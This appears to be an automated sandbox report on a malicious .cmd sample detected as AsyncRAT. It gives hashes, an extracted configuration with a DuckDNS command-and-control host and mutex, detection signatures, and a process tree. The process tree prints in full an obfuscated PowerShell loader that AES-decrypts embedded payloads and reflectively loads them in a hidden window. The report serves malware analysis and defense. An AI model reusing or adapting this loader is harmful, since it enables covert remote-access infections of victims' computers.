Analysis
-
max time kernel
132s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
24-05-2024 01:12
Static task
static1
Behavioral task
behavioral1
Sample
3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd
Resource
win7-20231129-en
General
-
Target
3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd
-
Size
72KB
-
MD5
4bfe57ca78dd1ac468e92a2307783552
-
SHA1
73966e6a19ba6f1ea47002ddcbc42d5ac6434b22
-
SHA256
3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee
-
SHA512
21a0071708eaeead1ebf0cb96ab39955b6ced797c0b9e25005c5c8ae4659f2ef842de42572f15fa02eb91df82eb5ba82b1b0d06d09d908d835f039f23fca4572
-
SSDEEP
1536:W4s6PYSYp0q0tIlQ2baGAIbsIpcEj/Bi81w2yfmfV2fymv:46PHY2glQ2nAIQUcY91Fj2fyi
Malware Config
Extracted
asyncrat
0.5.7B
Default
hjdsasync.duckdns.org:8797
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/628-40-0x0000000007160000-0x0000000007172000-memory.dmp family_asyncrat -
Detects executables packed with ConfuserEx Mod 1 IoCs
Processes:
resource yara_rule behavioral2/memory/628-38-0x0000000004B90000-0x0000000004BA2000-memory.dmp INDICATOR_EXE_Packed_ConfuserEx -
Detects file containing reversed ASEP Autorun registry keys 1 IoCs
Processes:
resource yara_rule behavioral2/memory/628-40-0x0000000007160000-0x0000000007172000-memory.dmp INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 13 628 powershell.exe 14 628 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 628 powershell.exe 1716 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 628 powershell.exe 628 powershell.exe 1716 powershell.exe 1716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 628 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 2892 wrote to memory of 1016 2892 cmd.exe cmd.exe PID 2892 wrote to memory of 1016 2892 cmd.exe cmd.exe PID 2892 wrote to memory of 3596 2892 cmd.exe cmd.exe PID 2892 wrote to memory of 3596 2892 cmd.exe cmd.exe PID 3596 wrote to memory of 992 3596 cmd.exe cmd.exe PID 3596 wrote to memory of 992 3596 cmd.exe cmd.exe PID 3596 wrote to memory of 1368 3596 cmd.exe cmd.exe PID 3596 wrote to memory of 1368 3596 cmd.exe cmd.exe PID 3596 wrote to memory of 628 3596 cmd.exe powershell.exe PID 3596 wrote to memory of 628 3596 cmd.exe powershell.exe PID 3596 wrote to memory of 628 3596 cmd.exe powershell.exe PID 628 wrote to memory of 1716 628 powershell.exe powershell.exe PID 628 wrote to memory of 1716 628 powershell.exe powershell.exe PID 628 wrote to memory of 1716 628 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵PID:1016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵PID:992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee.cmd';$jnWG='CopWZSmyTWZSmoWZSm'.Replace('WZSm', ''),'InlhpUvolhpUklhpUelhpU'.Replace('lhpU', ''),'CZIKWreaZIKWtZIKWeDeZIKWcZIKWryZIKWptoZIKWrZIKW'.Replace('ZIKW', ''),'ElzVbdemzVbdenzVbdtAzVbdtzVbd'.Replace('zVbd', ''),'ChayteonyteogeyteoEyteoxtyteoenyteosyteoionyteo'.Replace('yteo', ''),'ReplQraplQrdplQrLinplQresplQr'.Replace('plQr', ''),'EnRototRotorRotoyPRotooRotointRoto'.Replace('Roto', ''),'DecjqJxomjqJxpjqJxrjqJxesjqJxsjqJx'.Replace('jqJx', ''),'GeIEVqtCuIEVqrIEVqreIEVqntIEVqPrIEVqoIEVqcIEVqesIEVqsIEVq'.Replace('IEVq', ''),'FroWBktmBWBktasWBkte6WBkt4StWBktrWBktiWBktngWBkt'.Replace('WBkt', ''),'SpFryoliFryotFryo'.Replace('Fryo', ''),'MaoNWYinMoNWYodoNWYuoNWYloNWYeoNWY'.Replace('oNWY', ''),'LoZooQaZooQdZooQ'.Replace('ZooQ', ''),'TkUiTrankUiTsfokUiTrmkUiTFinkUiTalkUiTBkUiTlkUiTockkUiT'.Replace('kUiT', '');powershell -w hidden;function YsezZ($hYPZV){$VWSjA=[System.Security.Cryptography.Aes]::Create();$VWSjA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VWSjA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VWSjA.Key=[System.Convert]::($jnWG[9])('dIVP+hM/q3VrHeJIleztLe7YnRJfIUHX64EccbDbOY4=');$VWSjA.IV=[System.Convert]::($jnWG[9])('6IPeN2NKRdqw088nkuVbTg==');$BvjHr=$VWSjA.($jnWG[2])();$qFsMh=$BvjHr.($jnWG[13])($hYPZV,0,$hYPZV.Length);$BvjHr.Dispose();$VWSjA.Dispose();$qFsMh;}function ggFnh($hYPZV){$nRoYI=New-Object System.IO.MemoryStream(,$hYPZV);$BNSgW=New-Object System.IO.MemoryStream;$XVXGN=New-Object System.IO.Compression.GZipStream($nRoYI,[IO.Compression.CompressionMode]::($jnWG[7]));$XVXGN.($jnWG[0])($BNSgW);$XVXGN.Dispose();$nRoYI.Dispose();$BNSgW.Dispose();$BNSgW.ToArray();}$ldHdk=[System.IO.File]::($jnWG[5])([Console]::Title);$AAEWQ=ggFnh (YsezZ ([Convert]::($jnWG[9])([System.Linq.Enumerable]::($jnWG[3])($ldHdk, 5).Substring(2))));$xuGEv=ggFnh (YsezZ ([Convert]::($jnWG[9])([System.Linq.Enumerable]::($jnWG[3])($ldHdk, 6).Substring(2))));[System.Reflection.Assembly]::($jnWG[12])([byte[]]$xuGEv).($jnWG[6]).($jnWG[1])($null,$null);[System.Reflection.Assembly]::($jnWG[12])([byte[]]$AAEWQ).($jnWG[6]).($jnWG[1])($null,$null); "3⤵PID:1368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82